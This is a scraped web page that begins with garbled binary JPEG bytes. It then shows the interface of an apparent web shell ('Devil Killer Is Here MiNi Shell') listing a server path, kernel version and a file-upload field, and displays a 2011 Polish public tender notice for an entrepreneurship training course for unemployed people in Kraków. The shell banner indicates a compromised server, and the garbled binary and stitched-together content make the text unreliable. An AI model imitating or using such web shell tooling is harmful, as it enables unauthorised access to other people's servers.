JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/118511-N-2011.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego
na usługę szkoleniową pod nazwą Vademecum przedsiębiorczości
znak sprawy: ZP- 271/05/2011</b><br>
<b>Numer ogłoszenia: 118511 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 12 2997425, 12 6237480, faks 12 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego
na usługę szkoleniową pod nazwą Vademecum przedsiębiorczości
znak sprawy: ZP- 271/05/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu pod nazwą Vademecum przedsiębiorczości dla 150 osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego, którego celem jest przygotowanie uczestników do założenia i prowadzenia własnej działalności gospodarczej.
I. 1. Program szkolenia
1.	Program szkolenia musi zostać opracowany zgodnie z wymogami określonymi w:
a)	rozporządzeniu Ministra Pracy i Polityki Społecznej a dnia 02 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz.U. Nr 47, poz. 315) i zawierać informacje, o których mowa w § 32 ust. 4 cytowanego rozporządzenia, tj.: 
Nazwę i zakres szkolenia
Czas trwania i sposób organizacji szkolenia
Wymagania wstępne dla uczestników szkolenia
Cele szkolenia
Plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i praktycznej
Treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
Wykaz literatury oraz niezbędnych środków i materiałów edukacyjnych
Sposób sprawdzenia efektów szkolenia
b)	rozporządzeniu Ministra Edukacji i Nauki z dn. 03 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216) i zawierać informacje, o których mowa w § 5 cytowanego rozporządzenia.
2.	Program szkolenia winien wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez MPiPS na stronie internetowej www.standardyiszkolenia.praca.gov.pl a także zawierać następujące moduły tematyczne:
a)	Procedura zakładania działalności gospodarczej z omówieniem zagadnień formalnych związanych z rejestracją firmy w Urzędzie Gminy, ZUS, Urzędzie Skarbowym i Statystycznym,
b)	Metodologia tworzenia biznesplanu polegająca na szczegółowym omówieniu etapów tworzenia biznesplanu z jednoczesną obiektywną oceną możliwości powodzenia planowanego przedsięwzięcia. Na tym etapie szkolenia uczestnicy posiądą umiejętność rozpoznawania otoczenia konkurencyjnego a także przewidywania efektów finansowych planowanej działalności gospodarczej. Osoba prowadząca zajęcia dokona rzetelnej oceny potencjału zamierzenia gospodarczego, uwzględniającej sytuację na lokalnym rynku pracy w danej branży,
c)	Podstawy i procedury prawne z zakresu zakładania i funkcjonowania firmy:
Formy prawne prowadzenia działalności gospodarczej
Procedury prawno - administracyjne związane z prowadzeniem działalności gospodarczej
Umowy cywilno - prawne
Zatrudnianie pracowników - informacje ogólne
Prawo pracy
d)	Zobowiązania podatkowe i formy ewidencji podatkowej oraz rozliczania z tytułu ubezpieczeń, w tym ZUS - ogólne omówienie zagadnień dotyczących form opodatkowania oraz zagadnień dotyczących rozliczeń z tytułu ubezpieczeń. Szczególny nacisk należy położyć na zapoznanie uczestników szkolenia z terminami dokonywania rozliczeń,
e)	Szkolenie z zakresu BHP i ochrony przeciwpożarowej z omówieniem obowiązków wynikających w tym zakresie z Prawa Pracy,
f)	Omówienie wybranych zagadnień z zakresu ekonomii, marketingu i analizy rynku, form promocji w zakresie dotyczącym jednoosobowych firm.
3.	Program szkolenia składać się powinien z 75 godzin lekcyjnych, przy czym należy przyjąć, że 1 godzina = 45 minut, uwzględniających zajęcia teoretyczne i praktyczne oraz indywidualne konsultacje dla uczestników kursu, podczas których będą oni mogli omawiać z prowadzącymi problemy związane z opracowywanym przez nich planem przedsięwzięcia gospodarczego;
4.	Zajęcia praktyczne, w których mieszczą się indywidualne konsultacje, stanowić będą 53 godziny, natomiast zajęcia teoretyczne stanowić będą 22 godziny;
5.	Zamawiający oczekuje, że Wykonawca wykaże się indywidualnym podejściem do każdego uczestnika szkolenia a także dokona rzetelnej oceny biznesplanów w kontekście możliwości danego kursanta, jego przedsięwzięcia gospodarczego i sytuacji na lokalnym rynku.

I. 2. Wymogi organizacyjne
1.	Zamawiający skieruje na szkolenie 150 osób bezrobotnych. Zamawiający jednak zastrzega sobie możliwość zmniejszenia liczby osób kierowanych na szkolenie o 5 osób.
2.	Szkolenie realizowane będzie sukcesywnie, harmonogram realizacji zamówienia przedstawia się następująco:

1 edycja; termin realizacji 13 - 27  maja 2011; łączna ilość osób 40, (2 grupy po 20 osób)
2 edycja; termin realizacji 06 - 20 czerwca 2011; łączna ilość osób 40	, (2 grupy po 20 osób)
3 edycja; termin realizacji 17 - 31 sierpnia 2011; łączna ilość osób 30	(2 grupy po 15 osób)
4 edycja; termin realizacji 12 - 26 września 2011; łączna ilość osób 40 (2 grupy po 20 osób)

3.	W każdej edycji Wykonawca przeszkoli po dwie grupy uczestników, przy czym zajęcia dla obu grup realizowane będą równolegle. Ilość osób kierowanych na kurs w obrębie poszczególnych miesięcy jest założeniem Zamawiającego i z różnych przyczyn, może ulec niewielkim lecz bilansującym się wahaniom. Zamawiający zastrzega, że w przypadku, gdy procedura wyłonienia najkorzystniejszej oferty przedłuży się koniecznym może okazać się przesunięcie terminu realizacji szkolenia w ramach pierwszej edycji.
4.	Każda grupa szkoleniowa odbędzie trwające w sumie 75 godzin (1 godzina = 45 minut) zajęcia, które rozpoczną się i zakończą w obrębie jednego i tego samego miesiąca, trwać będą przez 15 dni kalendarzowych, zajęcia odbywać się będą od poniedziałku do piątku, w godzinach od 8.00 do max 18.00, z uwzględnieniem przynajmniej dwóch kilkuminutowych przerw.

I.	3. Pozostałe wymogi
1.	Wykonawca zobowiązany jest wyposażyć każdego uczestnika szkolenia w niezbędnie materiały dydaktyczne zgodne z zakresem tematycznym szkolenia, jak również do przekazania jednego kompletu do Urzędu Pracy Powiatu Krakowskiego (jeżeli zachodzi taka konieczność, Wykonawca wlicza w cenę szkolenia koszt przeznaczonego dla UPPK zestawu materiałów dydaktycznych). Komplet materiałów dydaktycznych Wykonawca dostarczy do Zamawiającego, najpóźniej w dniu rozpoczęcia pierwszej edycji szkolenia. Dodatkowo, Wykonawca wyposaży uczestników kursu w niezbędne materiały biurowe i piśmienne. Odbiór materiałów dydaktycznych potwierdzony zostanie przez każdego uczestnika podpisaniem stosownego oświadczenia.
2.	Wykonawca zapewni uczestnikom szkolenia dostęp do serwisu kawowego, tj. kawy, herbaty, drożdżówek oraz jednego ciepłego posiłku. Stawka żywieniowa ciepłego posiłku wyniesie od 12,00 do 15,00 złotych brutto. Uczestnicy zajęć każdorazowo potwierdzać będą odbiór ciepłego posiłku na odpowiedniej imiennej liście prowadzonej przez Wykonawcę systematycznie przez cały czas trwania zajęć. 
3.	Wykonawca zobowiązany będzie do przechowywania dokumentów potwierdzających realizację kursu, dotyczy to przede wszystkim: programu kursu, harmonogramu, dokumentów związanych z poniesionymi kosztami kursu (kosztorys), kserokopii zaświadczeń ukończonego kursu, listy obecności uczestników kursu.
4.	Na zakończenie kursu, w ramach wynagrodzenia należnego Wykonawcy  z tytułu realizacji szkolenia, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Na etapie sporządzania oferty i wyliczania całkowitego zwrotu kosztów przejazdu ujmowanych w preliminarzu należy przyjąć  założenie o pełnej, tj 100 %, frekwencji uczestników, która - na etapie realizacji umowy - zweryfikowana będzie na podstawie listy obecności uczestników zajęć. Zamawiający pokryje Wykonawcy nakłady poniesione z tytułu zwrotu kosztów przejazdu uczestników zajęć na podstawie list obecności. Kwotę zwrotu kosztów przejazdu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
5.	Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.), Wykonawca zobowiązany będzie do ubezpieczenia uczestników szkolenia do następstw nieszczęśliwych wypadków, z wyjątkiem osób posiadających prawo do stypendium. Okres ubezpieczenia obejmie cały okres trwania szkolenia. W razie zaistnienia wypadku przy pracy, tj. okoliczności, o której mowa w art. 3 ust. 3 pkt. 4 ustawy z dnia 30 października 2002 r. o ubezpieczeniu społecznym z tytułu wypadków przy pracy i chorób zawodowych (Dz. U. z 2009 r., Nr 167, poz. 1322 z późn. zm), Wykonawca zobowiązany będzie do ustalenia przyczyn i okoliczności wypadku przy pracy - zgodnie z art. 5 ust. 1 pkt 4 przywołanej powyżej ustawy. Koszt ubezpieczenia NW wyliczony przy założeniu, iż wszyscy uczestnicy szkolenia będą podlegali ubezpieczeniu, należy wyszczególnić w preliminarzu oraz uwzględnić go w całkowitym koszcie szkolenia ujmowanym w formularzu ofertowym. Zamawiający przedstawi Wykonawcy imienną listę osób wskazanych do ubezpieczenia. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć. 
6.	Zgodnie z § 31 ust. 1 pkt 4 rozporządzenia Ministra Pracy i Polityki Społecznej a dnia 02 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy Wykonawca zapewni nadzór wewnętrzny przebiegu szkolenia służący podnoszeniu jakości  prowadzonego szkolenia a także wskaże personalnie osobę za nadzór odpowiedzialną. Do oferty należy załączyć informację o sposobie sprawowania nadzoru z podaniem osoby za niego odpowiedzialnej.
7.	Wykonawca zobowiązany będzie do prowadzenia następującej dokumentacji:
a)	dziennika zajęć edukacyjnych zawierającego tematy i wymiar godzin zajęć edukacyjnych oraz listę obecności zawierającą: imię, nazwisko i podpis uczestnika szkolenia,
b)	arkusza organizacji kształcenia na odległość, zawierającego sposób kontaktowania się z konsultantem, terminy konsultacji indywidualnych i zbiorowych, terminy ćwiczeń wykonywanych pod nadzorem konsultanta oraz terminy, warunki i formy sprawdzania efektów kształcenia - w przypadku zajęć prowadzonych w formule kształcenia na odległość,
c)	rejestru odbytych konsultacji i zrealizowanych ćwiczeń pod nadzorem konsultanta, w przypadku zajęć prowadzonych w formule kształcenia na odległość,
d)	protokołu i karty ocen z okresowych sprawdzianów efektów kształcenia oraz egzaminu końcowego, jeżeli zostały przeprowadzone,
e)	rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, zawierającego: numer, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, oraz nazwę szkolenia i datę wydania zaświadczenia,
f)	oświadczenia uczestników szkolenia dotyczącego skorzystania z ciepłych posiłków,
g)	imiennej listy, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie.
8.	Wykonawca zobowiązany jest do bieżącego informowania Zamawiającego na piśmie, pod rygorem odmowy zapłaty za przedmiot umowy, o:
a)	niezgłoszeniu się na rozpoczęcie kursu osób skierowanych,
b)	nieobecnościach na kursie osób skierowanych wraz z posiadanymi dokumentami dotyczącymi absencji na zajęciach kursu,
c)	rezygnacji z uczestnictwa w kursie osób skierowanych,
d)	nieprzystąpieniu do egzaminu osób skierowanych.
9.	Wykonawca zobowiązany jest do przekazania Zamawiającemu w terminie 7 dni od dnia zakończenia kursu biznesplanów wraz z oceną punktową i opisową, oraz w terminie do 5 dni po zakończeniu kursu następujących dokumentów:
a)	oryginału imiennego wykazu osób, które ukończyły kurs,
b)	oryginału imiennego wykazu osób, które nie ukończyły kursu, nie sporządziły i nie przedłożyły biznesplanu,
c)	oryginału rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie kwalifikacji,
d)	oryginału listy potwierdzającej odbiór kosztów przejazdu,
e)	oryginałów oświadczeń uczestników, dotyczących odbioru materiałów dydaktycznych i biurowych,
f)	oryginału oświadczenia uczestników, dotyczącego skorzystania z ciepłych posiłków,
g)	oryginału kosztorysu podwykonawczego,
h)	kserokopii listy obecności,
i)	kserokopii polisy ubezpieczeniowej,
j)	kserokopii protokołu z egzaminu, jeżeli został przeprowadzony,
k)	kserokopii dziennika zajęć,
l)	innej dokumentacji niezbędnej do rozliczenia kursu.
Wszystkie kserokopie winny zostać potwierdzone za zgodność z oryginałem.
10.	Miejsce realizacji zajęć musi być usytuowane w mieście Krakowie.
11.	Wykonawca winien dostosować ilość i jakość pomieszczeń oraz wyposażenie w sprzęt i pomoce dydaktyczne do potrzeb przedmiotowego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki. Sale dydaktyczne powinny być wyposażone stosownie do potrzeb co najmniej dwóch 20-osobowych grup słuchaczy. Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych oraz opisem rodzaju i ilości urządzeń niezbędnych do zrealizowania zajęć praktycznych. 
12.	Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej - stanowiącej załącznik nr 9 do SIWZ.
13.	Wykonawca zobowiązany będzie do dokonania analizy wypełnionych przez uczestników szkolenia ankiet oraz przedstawienia jej wyników Zamawiającemu. 
14.	Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć. 
15.	Zamawiający zastrzega sobie prawo przeprowadzania niezapowiedzianych wizyt monitorujących, w trakcie których przeprowadzana będzie kontrola przebiegu szkolenia pod względem poprawności realizacji umowy. W związku z powyższym, Wykonawca zapewni wgląd w dokumentację szkolenia na każdym etapie jego realizacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga sie wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w punkcie III.1) SIWZ został spełniony w sytuacji, gdy Wykonawca złoży wraz z ofertą stosowne oświadczenie o podleganiu wpisowi do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej stanowiące załącznik nr 10 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiając uzna, że warunek określony w punkcie III.2) został spełniony, w sytuacji gdy Wykonawca wykaże w Wykazie wykonanych usług stanowiącym załącznik nr 5 do SIWZ, w kolumnie pn. Przedmiot usług, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia przez Wykonawcę działalności jest krótszy - w tym okresie, zrealizował co najmniej trzy szkolenia z zakresu przedsiębiorczości i/lub konstruowania biznesplanu, z czego w każdym szkoleniu uczestniczyło co najmniej 20 słuchaczy. W sytuacji, gdy Wykonawca wykaże się realizacją szkoleń składających się z kilku edycji - każda edycja traktowana będzie jako odrębne szkolenie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający uzna, że warunek określony w punkcie III.3. a) został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia stanowiącym załącznik nr 4 do SIWZ, że dysponuje lub będzie dysponował co najmniej dwiema osobami uczestniczącymi w wykonaniu zamówienia, które - co należy wykazać w kolumnie pn. Doświadczenie i wykształcenie - posiadają doświadczenie w realizacji lub współrealizacji co najmniej trzech szkoleń z zakresu przedsiębiorczości i/lub konstruowania biznesplanu;
2) Zamawiający uzna, że warunek określony w punkcie III.3. b) został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia stanowiącym załącznik nr 4 do SIWZ, że dysponuje lub będzie dysponował co najmniej jedną osobą uczestniczącą w wykonaniu zamówienia, która - co należy wykazać w kolumnie pn. Doświadczenie i wykształcenie - wykonuje zawód technika bezpieczeństwa i higieny pracy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - załącznik nr 1 do SIWZ;
2.	Oświadczenie o podleganiu wpisowi do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej - załącznik nr 10 do SIWZ. 
3.	Szczegółowy program szkolenia opracowany na podstawie wytycznych zawartych w punkcie I) SIWZ.
4.	Harmonogram zajęć rozpisany dla poszczególnych grup ze wskazaniem dni (konkretnych dat) i godzin trwania szkolenia z podaniem tematyki i rodzaju zajęć, czasu ich trwania oraz nazwiska osoby prowadzącej.
5.	Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 7, Wykonawca wskazał osoby, którymi będzie dysponował. 
6.	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy swojej wiedzy i doświadczenia jeżeli w wykazie, o którym mowa w punkcie 9 Wykonawca wskazał doświadczenie innych podmiotów.
7.	Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych.
8.	Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia - załącznik nr 7 do SIWZ.
9.	Preliminarz kosztów - załącznik nr 6 do SIWZ.
10.	Certyfikat jakości usług potwierdzający wysoki standard świadczonych usług szkoleniowych (np. akredytacja kuratora oświaty, certyfikat systemu zarządzania jakością kształcenia/szkolenia wydany na podstawie międzynarodowych norm ISO, itp.), jeżeli Wykonawca takim dysponuje.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50.00</li>
<li>2 - liczba przeprowadzonych szkoleń z zakresu przedsiębiorczości i/lub konstruowania biznesplanu w ciągu ostatnich trzech lat przed upływem terminu skł - 15.00</li>
<li>3 - liczba osób przeszkolonych z zakresu przedsiębiorczości i/lub konstruowania biznesplanu w ciągu ostatnich trzech lat przed upływem terminu składani - 15.00</li>
<li>4 - posiadanie przez Wykonawcę certyfikatu jakości usług, który potwierdzałby wysoki standard świadczonych usług - 20.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
